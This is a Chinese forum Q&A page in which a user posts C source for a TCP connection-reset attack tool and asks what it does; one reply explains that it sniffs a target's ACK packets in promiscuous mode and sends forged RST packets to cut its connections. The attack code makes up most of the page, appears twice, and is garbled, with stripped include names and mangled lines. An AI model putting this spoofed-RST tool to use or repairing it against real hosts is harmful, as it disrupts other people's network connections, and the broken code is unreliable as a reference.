当前位置: 技术问答>linux和unix
大家给看看下面这个攻击程序吧!
来源: 互联网 发布时间:2015-04-01
本文导语: 据说是若被攻击IP位于同网段,则断开它与外界的所有tcp连接若为远程主机,则断开它与本网段的所有tcp连接。本工具可以用来对付大白天搜proxy的机器,前提是泥知道哪台机器在搜,且该机器位于同网段, 可我用自己...
据说是若被攻击IP位于同网段,则断开它与外界的所有tcp连接若为远程主机,则断开它与本网段的所有tcp连接。本工具可以用来对付大白天搜proxy的机器,前提是泥知道哪台机器在搜,且该机器位于同网段, 可我用自己的两台机器互相攻了一下好像没什么反应?大家给分析一下她到底在干吗吧?
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __FAVOR_BSD
#include
#define IP_TCP 6
#define PACKET_SIZE 4096
struct pseudohdr // pseudo tcp header
{
u_long saddr;
u_long daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
struct ip_packet
{
struct iphdr ipheader;
struct tcphdr tcpheader;
};
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for (i = 0;i > 1);i ++)
value += data[i];
if ((length & 1) == 1)
value += (data[i] 16);
return(~value);
}
void leave();
int fd_recv = -1, fd_send = -1;
struct ifreq ifr, ifr_old;
main(int argc,char *argv[])
{
char device[] = "eth0";
u_char buf_recv[PACKET_SIZE];
struct ip_packet buf_send;
struct pseudohdr pseudoheader;
struct iphdr * ip;
struct tcphdr * tcp;
struct in_addr in;
u_long ips;
int i, j, k;
int from_len, datalen;
struct sockaddr from; struct sockaddr_in to;
if (argc th_flags & TH_ACK ) == 0) goto AGAIN;
in.s_addr = ip->daddr;
printf("%s:%d to %s:%d listened, ", argv[1],
ntohs(tcp->th_sport), inet_ntoa(in),
ntohs(tcp->th_dport) );
if ( (fd_send = socket( AF_INET,
SOCK_RAW,IPPROTO_RAW)) == -1) {
perror("raw socket error");
exit(-1);
}
bzero((char *)&buf_send, sizeof(struct ip_packet));
/*FAKE TCP HEADER*/
buf_send.tcpheader.th_sport = tcp->th_dport;
buf_send.tcpheader.th_dport = tcp->th_sport;
buf_send.tcpheader.th_seq = tcp->th_ack;
buf_send.tcpheader.th_ack = tcp->th_seq;
buf_send.tcpheader.th_x2 = 0;
buf_send.tcpheader.th_off = 0x50;
buf_send.tcpheader.th_flags = TH_RST;
buf_send.tcpheader.th_win= htons(2048);
buf_send.tcpheader.th_sum= 0;
buf_send.tcpheader.th_urp= 0;
/*FAKE IP HEADER*/
buf_send.ipheader.version = 4;
buf_send.ipheader.ihl = 5;
buf_send.ipheader.tos = 0;
buf_send.ipheader.tot_len = htons(0x28);
buf_send.ipheader.id = 0x1234;
buf_send.ipheader.frag_off = 0;
buf_send.ipheader.ttl = 0xff;
buf_send.ipheader.protocol = IP_TCP;
buf_send.ipheader.check = 0;
buf_send.ipheader.saddr = ip->daddr;
buf_send.ipheader.daddr = ip->saddr;
/*TCP CHECK SUM*/
bzero(&pseudoheader, 12 + sizeof(struct tcphdr));
pseudoheader.saddr = ip->daddr;
pseudoheader.daddr = ip->saddr;
pseudoheader.protocol = 6;
pseudoheader.length = htons(sizeof(struct tcphdr));
bcopy( (char *) &buf_send.tcpheader,
(char *) &pseudoheader.tcpheader,
sizeof(struct tcphdr) );
buf_send.tcpheader.th_sum = checksum(
(u_short *) &pseudoheader,
12+sizeof(struct tcphdr) );
to.sin_family = AF_INET;
to.sin_addr.s_addr = ips;
k = sendto( fd_send, (char *)& buf_send, 40, 0,
(struct sockaddr *)&to,
sizeof(struct sockaddr) );
if (k 0) close(fd_send);
printf("process terminamted.n");
exit(0);
}
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __FAVOR_BSD
#include
#define IP_TCP 6
#define PACKET_SIZE 4096
struct pseudohdr // pseudo tcp header
{
u_long saddr;
u_long daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
struct ip_packet
{
struct iphdr ipheader;
struct tcphdr tcpheader;
};
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for (i = 0;i > 1);i ++)
value += data[i];
if ((length & 1) == 1)
value += (data[i] 16);
return(~value);
}
void leave();
int fd_recv = -1, fd_send = -1;
struct ifreq ifr, ifr_old;
main(int argc,char *argv[])
{
char device[] = "eth0";
u_char buf_recv[PACKET_SIZE];
struct ip_packet buf_send;
struct pseudohdr pseudoheader;
struct iphdr * ip;
struct tcphdr * tcp;
struct in_addr in;
u_long ips;
int i, j, k;
int from_len, datalen;
struct sockaddr from; struct sockaddr_in to;
if (argc th_flags & TH_ACK ) == 0) goto AGAIN;
in.s_addr = ip->daddr;
printf("%s:%d to %s:%d listened, ", argv[1],
ntohs(tcp->th_sport), inet_ntoa(in),
ntohs(tcp->th_dport) );
if ( (fd_send = socket( AF_INET,
SOCK_RAW,IPPROTO_RAW)) == -1) {
perror("raw socket error");
exit(-1);
}
bzero((char *)&buf_send, sizeof(struct ip_packet));
/*FAKE TCP HEADER*/
buf_send.tcpheader.th_sport = tcp->th_dport;
buf_send.tcpheader.th_dport = tcp->th_sport;
buf_send.tcpheader.th_seq = tcp->th_ack;
buf_send.tcpheader.th_ack = tcp->th_seq;
buf_send.tcpheader.th_x2 = 0;
buf_send.tcpheader.th_off = 0x50;
buf_send.tcpheader.th_flags = TH_RST;
buf_send.tcpheader.th_win= htons(2048);
buf_send.tcpheader.th_sum= 0;
buf_send.tcpheader.th_urp= 0;
/*FAKE IP HEADER*/
buf_send.ipheader.version = 4;
buf_send.ipheader.ihl = 5;
buf_send.ipheader.tos = 0;
buf_send.ipheader.tot_len = htons(0x28);
buf_send.ipheader.id = 0x1234;
buf_send.ipheader.frag_off = 0;
buf_send.ipheader.ttl = 0xff;
buf_send.ipheader.protocol = IP_TCP;
buf_send.ipheader.check = 0;
buf_send.ipheader.saddr = ip->daddr;
buf_send.ipheader.daddr = ip->saddr;
/*TCP CHECK SUM*/
bzero(&pseudoheader, 12 + sizeof(struct tcphdr));
pseudoheader.saddr = ip->daddr;
pseudoheader.daddr = ip->saddr;
pseudoheader.protocol = 6;
pseudoheader.length = htons(sizeof(struct tcphdr));
bcopy( (char *) &buf_send.tcpheader,
(char *) &pseudoheader.tcpheader,
sizeof(struct tcphdr) );
buf_send.tcpheader.th_sum = checksum(
(u_short *) &pseudoheader,
12+sizeof(struct tcphdr) );
to.sin_family = AF_INET;
to.sin_addr.s_addr = ips;
k = sendto( fd_send, (char *)& buf_send, 40, 0,
(struct sockaddr *)&to,
sizeof(struct sockaddr) );
if (k 0) close(fd_send);
printf("process terminamted.n");
exit(0);
}
|
搂主在做这方面的研究么?少见少见阿
大体上看了一下这段程序。
这个程序用命令行参数作为攻击对象,首先将自己的网卡设置成混杂模式,然后开始监听攻击对象的数据包,如果监听到的数据包满足:是IP包,而且是TCP的ACK包时,就发送一个RST包来重置连接,来达到断开连接的目的。如果程序退出,就让网卡退出混杂模式
如果你想找错的化,可以在你的机器上和目标机器上用tcpdump来抓一下包,看看你的伪造包到底发没发给目的主机,如果是收到了,可能是包的结构不对。
由于我也是初学,所以也就理解了这么多。
TCP/IP协议也是我以后的方向,希望能够多多交流。
我的QQ:49462335
大体上看了一下这段程序。
这个程序用命令行参数作为攻击对象,首先将自己的网卡设置成混杂模式,然后开始监听攻击对象的数据包,如果监听到的数据包满足:是IP包,而且是TCP的ACK包时,就发送一个RST包来重置连接,来达到断开连接的目的。如果程序退出,就让网卡退出混杂模式
如果你想找错的化,可以在你的机器上和目标机器上用tcpdump来抓一下包,看看你的伪造包到底发没发给目的主机,如果是收到了,可能是包的结构不对。
由于我也是初学,所以也就理解了这么多。
TCP/IP协议也是我以后的方向,希望能够多多交流。
我的QQ:49462335